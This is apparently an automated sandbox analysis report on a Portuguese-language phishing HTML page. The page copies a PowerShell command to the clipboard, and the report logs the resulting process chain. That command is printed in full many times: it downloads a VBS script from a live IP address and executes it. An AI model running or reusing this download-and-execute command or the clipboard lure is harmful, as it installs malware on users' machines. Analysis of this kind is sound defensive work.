Source: unknown HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.6:49710 version: TLS 1.2

System Summary
barindex
Potential malicious VBS script found (suspicious strings)
Source: C:\Windows\SysWOW64\wscript.exe Dropped file: Set ThkGxLKcuPvTArJnchaVkYMBRnShRJqxHfpVTtq = CreateObject("WinHttp.WinHttpRequest.5.1") Jump to dropped file
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\wscript.exe Process Stats: CPU usage > 49%
Source: classification engine Classification label: mal100.phis.expl.winHTML@31/9@10/8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6532:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sxe5w40a.ajj.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /K powershell -windowstyle minimized -Command "$u='http://18.218.213.93/187.php'; $t=$env:temp + '\2539.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t } $action='Habilitar Visualiza o de ficheiro DOCx';"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2216,i,15274266427159168014,14662960723393588490,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2252 /prefetch:3
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\COMPROVATIVO-25643582-MAIO-CTG6Z-W3OSD - 211.html"
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /K powershell -windowstyle minimized -Command "$u='http://18.218.213.93/187.php'; $t=$env:temp + '\2539.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t } $action='Habilitar Visualiza o de ficheiro DOCx';"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle minimized -Command "$u='http://18.218.213.93/187.php'; $t=$env:temp + '\2539.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t } $action='Habilitar Visualiza o de ficheiro DOCx';"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\2539.vbs"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2216,i,15274266427159168014,14662960723393588490,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2252 /prefetch:3 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle minimized -Command "$u='http://18.218.213.93/187.php'; $t=$env:temp + '\2539.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t } $action='Habilitar Visualiza o de ficheiro DOCx';" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle minimized -Command "$u='http://18.218.213.93/187.php'; $t=$env:temp + '\2539.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t } $action='Habilitar Visualiza o de ficheiro DOCx';" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\2539.vbs" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior

Data Obfuscation
barindex
Suspicious powershell command line found
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle minimized -Command "$u='http://18.218.213.93/187.php'; $t=$env:temp + '\2539.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t } $action='Habilitar Visualiza o de ficheiro DOCx';"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle minimized -Command "$u='http://18.218.213.93/187.php'; $t=$env:temp + '\2539.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t } $action='Habilitar Visualiza o de ficheiro DOCx';" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle minimized -Command "$u='http://18.218.213.93/187.php'; $t=$env:temp + '\2539.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t } $action='Habilitar Visualiza o de ficheiro DOCx';" Jump to behavior

Persistence and Installation Behavior
barindex
HTML page adds supicious text to clipboard
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Clipboard modification: powershell -windowstyle minimized -Command "$u='http://18.218.213.93/187.php'; $t=$env:temp + '\2539.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t } $action='Habilitar Visualizao de ficheiro DOCx';"
Windows Shell Script Host drops VBS files
Source: C:\Windows\SysWOW64\wscript.exe File created: C:\Users\user\AppData\Local\Temp\5767.vbs Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
